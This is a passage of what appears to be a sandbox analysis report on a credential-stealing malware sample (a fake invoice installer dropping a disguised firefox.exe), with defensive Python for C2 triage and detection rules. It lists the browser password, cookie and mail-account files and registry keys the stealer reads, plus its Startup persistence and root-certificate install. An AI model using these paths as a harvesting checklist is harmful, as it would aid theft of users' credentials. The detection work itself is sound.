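    return {"by_category": dict(by_cat), "c2": c2, "bot_ids": bot_ids}


if __name__ == "__main__":
    result = triage(SAMPLE_ROWS)
    for cat, urls in sorted(result["by_category"].items()):
        print(f"{cat:16s} {len(urls)}")
    for rec in result["c2"]:
        print("C2 candidate", rec["host"], "in", ", ".join(rec["processes"]), "bot id", rec["bot_id"])
```

Run it against the full row list of a report rather than the sample and the candidate-c2 bucket is what goes into the IOC feed; the source attribution matters because the same host appearing in a memory dump of an injected system process (dllhost.exe here) is far stronger evidence than a string in a dropped third-party binary.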
Uses HTTPS
Source: unknown | Network traffic detected: HTTP traffic on port 443, recorded in both directions (443 -> client port and client port -> 443) for 57 client ports: 49162, 49164-49165, 49167-49170 and 49172-49221 (114 rows in the original listing).

Boot Survival:

Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\F48A04623C4E0000.lnk
Stores files to the Windows start menu directory
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\F48A04623C4E0000.lnk

Stealing of Sensitive Information:

Searches for Windows Mail specific files
Source: C:\Windows\System32\msiexec.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
Source: C:\Windows\System32\msiexec.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail unknown
Source: C:\Windows\System32\msiexec.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
Source: C:\Windows\System32\msiexec.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
Source: C:\Windows\System32\msiexec.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup unknown
Source: C:\Windows\System32\msiexec.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
Source: C:\Windows\System32\msiexec.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new unknown
Source: C:\Windows\System32\msiexec.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery *
Source: C:\Windows\System32\msiexec.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery unknown
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\System32\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\secmod.db
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\098A3394207ED67B189FE76C2DC12503C3C08949
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\CE878AF4D6089481AC21378C5017FC97F30E7ADB
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\D884B3C0D6FDA5EAB04FCB8FC7E00A32EAD9147D
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\0ACF70C2B13F90BCCE7A52239424071DF5436F7B
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\CE40DF72E47995F12B7A0C9DB884C82D865203F5
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\EE3B023192255EF0F8BF72624FD26BCBEA167009
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\CA3B4F6C3670A7775C21F456BFC6AE66E765D830
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\505E6E43C2A9FD25648488269AA49528B3B8B6DE
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\9D5CCF1EF546D43662C8D258C04D271045A57285
Source: C:\Windows\System32\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\38F74FDB1007352CF593939F58B86ABEC18A7F95
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\98F3CC667C872833F2A93C841A531CD308BB708E
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\228A34E27343511229AA075674752A42E75408BD
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\929BCF811537CE5A1B05BC367E7D5FCD9D1512C2
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\01974EBFBB850697430A4F12734195ED05077738
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default
Source: C:\Windows\System32\msiexec.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cert7.db
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles
Source: C:\Windows\System32\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\places.sqlite
Source: C:\Windows\System32\msiexec.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\secmod.db
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\5118460E55865416751E8062BAB1E7C4F471E49D
Source: C:\Windows\System32\msiexec.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cert8.db
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\F498ADAC6BF11455860012AC807BE6C78952E1ED
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\2E3CB874702C1D5349B27C8399A6E3FCF8D8224F
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\E3D13C4D3E3F56773BFB6A7E2AC5F1A24F83F5FE
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\F17BF163CA7D855DE2D59C9C9925270D09724B92
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\F045CCBF583BD17042216E343183D80AC87C5FB9
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\AF64C36C1E91371D6368F8CCA8AED4DE577941DA
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\doomed
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\E325B486B777C14C29762600D998974140F8FD34
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\92531506A03012426BA6B1963DED1B2B4B032D26
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\F1B5C3EDE100D4A38A0A28F1CEF6FAEFB619EC1B
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\9F133021167E7F8282CC52C8D01EA90928166C26
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\996E251B0D179792066F30DEB82476DF9D5E8B15
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\6C74841001D328873ED43FCA9D5F4071C6D772B0
Source: C:\Windows\System32\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\System32\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\key3.db
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\8179DFAE4FED04E4AFC32B457F9A3FD29DB817EB
Source: C:\Windows\System32\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\cert8.db
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\29069ED1065B580BDC977A33A70AE7B2505EB534
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\EF266C446B089CF06B1E028D371C054ABCDEBA8D
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\787A933634DE6FD6F6497A291396B61F2047DF37
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\50001F8708BB02872D097BFAF94D7030CAF9CAF1
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\cookies.sqlite
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\2FC00D105DDC9C4B11E5D8DDE4091512B1EEA3C7
Tries to steal Instant Messenger accounts or passwords
Source: C:\Windows\System32\msiexec.exe | Key opened: HKEY_USERS\Software\Google\Google Talk\Accounts
Tries to steal Mail credentials (via file access)
Source: C:\Windows\System32\msiexec.exe | Key opened: HKEY_USERS\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\System32\msiexec.exe | Key opened: HKEY_USERS\Identities\{7E3C98C2-A457-4C7B-90BC-6B7522D9BDED}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\System32\msiexec.exe | Key opened: HKEY_USERS\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\System32\msiexec.exe | Key opened: HKEY_USERS\Software\IncrediMail\Identities
Source: C:\Windows\System32\msiexec.exe | Key opened: HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities
Source: C:\Windows\System32\msiexec.exe | Key opened: HKEY_USERS\Software\Microsoft\Windows Live Mail

Persistence and Installation Behavior:

Installs new ROOT certificates
Source: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob (the same value is written five times in the report)
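Read together, the Boot Survival, Stealing of Sensitive Information and Persistence rows above describe a sequence that a detection engineer can encode directly: a Windows binary (msiexec.exe, which has no business there) opening the Firefox key3.db, cert8.db, places.sqlite and profiles.ini and the Chrome Login Data file; the same process enumerating Outlook, Windows Live Mail, IncrediMail and Google Talk account keys; the installer's temporary firefox.exe writing a .lnk named F48A04623C4E0000 into the Startup folder and a directory of the same name under %AppData%\Roaming; and the firefox.exe living in that directory writing a Blob under HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates. The Python below is an added example, not part of the Joe Sandbox report or of any product it mentions: it runs those rules over a constructed event list modelled on the rows on this page. The (event, process, target) schema is an assumption of the example, to be mapped from whatever file, registry and process telemetry is available; the file, key and path lists are the example's own. One design point is deliberate: the browser allowlist holds full image paths, not image names, because the dropped stealer is itself called firefox.exe.

```python
import re
from collections import defaultdict
from ntpath import basename

# Constructed telemetry modelled on the behaviour rows of this report. The
# (event, process, target) schema is an assumption for the example only.
EVENTS = [
    {"event": "file_open", "process": r"C:\Windows\System32\msiexec.exe",
     "target": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\key3.db"},
    {"event": "file_open", "process": r"C:\Windows\System32\msiexec.exe",
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"event": "file_open", "process": r"C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe",
     "target": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\cookies.sqlite"},
    # Control case: the installed browser reading its own profile must not fire.
    {"event": "file_open", "process": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "target": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\cookies.sqlite"},
    {"event": "reg_open", "process": r"C:\Windows\System32\msiexec.exe",
     "target": r"HKEY_USERS\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts"},
    {"event": "file_create", "process": r"C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe",
     "target": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\F48A04623C4E0000.lnk"},
    {"event": "file_create", "process": r"C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe",
     "target": r"C:\Users\user\AppData\Roaming\F48A04623C4E0000\LOL_DLL.dll"},
    {"event": "reg_set", "process": r"C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe",
     "target": r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates"
               r"\3F728A35DE52B2C8994A4FB101A03B95E87B06C8\Blob"},
]

# Browser credential, history, cookie and NSS key/cert store file names (Firefox, Chrome).
CRED_FILES = {"key3.db", "key4.db", "logins.json", "signons.sqlite", "cert8.db", "cert9.db",
              "secmod.db", "places.sqlite", "cookies.sqlite", "profiles.ini", "login data", "web data"}
# Full image paths, lower-cased: a name-only allowlist would pass the dropped firefox.exe.
BROWSER_IMAGES = {
    r"c:\program files\mozilla firefox\firefox.exe",
    r"c:\program files (x86)\mozilla firefox\firefox.exe",
    r"c:\program files\google\chrome\application\chrome.exe",
    r"c:\program files (x86)\google\chrome\application\chrome.exe",
}
# Registry locations the report shows being opened for mail / IM account data.
MAIL_KEYS = ("\\omi account manager\\accounts", "\\windows live mail", "\\incredimail\\identities",
             "\\google talk\\accounts", "\\windows messaging subsystem\\profiles")
STARTUP_DIR = "\\microsoft\\windows\\start menu\\programs\\startup\\"
ROOT_STORE = "\\systemcertificates\\root\\certificates\\"
THUMBPRINT = re.compile(r"\\certificates\\([0-9a-f]{40})", re.I)
APPDATA_ID = re.compile(r"\\appdata\\roaming\\([0-9a-f]{16})\\", re.I)


def _identifier_sightings(e):
    """Return (token, where) pairs for 16-hex identifiers used as .lnk or directory names."""
    seen, tgt = [], e["target"]
    if e["event"] == "file_create" and STARTUP_DIR in tgt.lower() and tgt.lower().endswith(".lnk"):
        stem = basename(tgt)[:-4]
        if re.fullmatch(r"[0-9A-Fa-f]{16}", stem):
            seen.append((stem, "startup-lnk"))
    for path in (e["process"], tgt):
        m = APPDATA_ID.search(path)
        if m:
            seen.append((m.group(1), "appdata-dir"))
    return seen


def detect(events):
    """Apply the rules to a list of events and return the findings as dicts."""
    findings, sightings = [], defaultdict(set)
    for e in events:
        proc, tgt, kind = e["process"].lower(), e["target"].lower(), e["event"]
        if kind == "file_open" and basename(tgt) in CRED_FILES and proc not in BROWSER_IMAGES:
            findings.append({"rule": "credential-store-read", "process": e["process"], "detail": e["target"]})
        if kind == "reg_open" and any(k in tgt for k in MAIL_KEYS):
            findings.append({"rule": "mail-account-enumeration", "process": e["process"], "detail": e["target"]})
        if kind == "file_create" and STARTUP_DIR in tgt and tgt.endswith(".lnk"):
            findings.append({"rule": "startup-persistence", "process": e["process"], "detail": e["target"]})
        if kind == "reg_set" and ROOT_STORE in tgt:
            m = THUMBPRINT.search(e["target"])
            findings.append({"rule": "root-certificate-install", "process": e["process"],
                             "detail": m.group(1) if m else e["target"]})
        for token, where in _identifier_sightings(e):
            sightings[token.upper()].add(where)
    # One token reused as Startup .lnk name and %AppData% directory ties the persistence
    # entry and the drop location to a single implant instance.
    for token, places in sightings.items():
        if len(places) > 1:
            findings.append({"rule": "identifier-correlation", "process": None,
                             "detail": token + " seen as " + ", ".join(sorted(places))})
    return findings


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f"{f['rule']:26s} {f['process'] or '-'}  ->  {f['detail']}")
```

The root-store rule fires on any write under the ROOT container by a non-system process and reports the thumbprint from the key name (3F728A35DE52B2C8994A4FB101A03B95E87B06C8 here); what that certificate is for cannot be read off this report, so the thumbprint is exported as an indicator rather than interpreted.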
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | File created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-memory-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | File created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-H27TI.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | File created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-4HQM2.tmp
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | File created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-string-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | File created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-IEU03.tmp
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | File created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-heap-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | File created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-BKEF7.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | File created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-3OGF7.tmp
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | File created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\mozglue.dll
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | File created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-KMNP5.tmp
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | File created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-synch-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | File created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-QD0HG.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | File created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-HRJGD.tmp
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | File created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\LOL_DLL.dll
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | File created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-environment-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp | File created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-RQQDV.tmp
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | File created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-multibyte-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | File created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-handle-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | File created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-file-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | File created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-heap-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | File created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-runtime-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | File created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-filesystem-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe | File created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-profile-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-S9A25.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-ENSEN.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-7MF7K.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-UPNUP.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-AMM6D.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-console-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-BVQS8.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-QG57B.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-TLFG5.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-A8QRP.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-J5TU2.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-8PSLE.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-ARJ01.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-LQISF.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-6FJQD.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-SJFE0.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exeFile created: C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-4DUIV.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmpFile created: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-SNF6L.tmpJump to dropped file
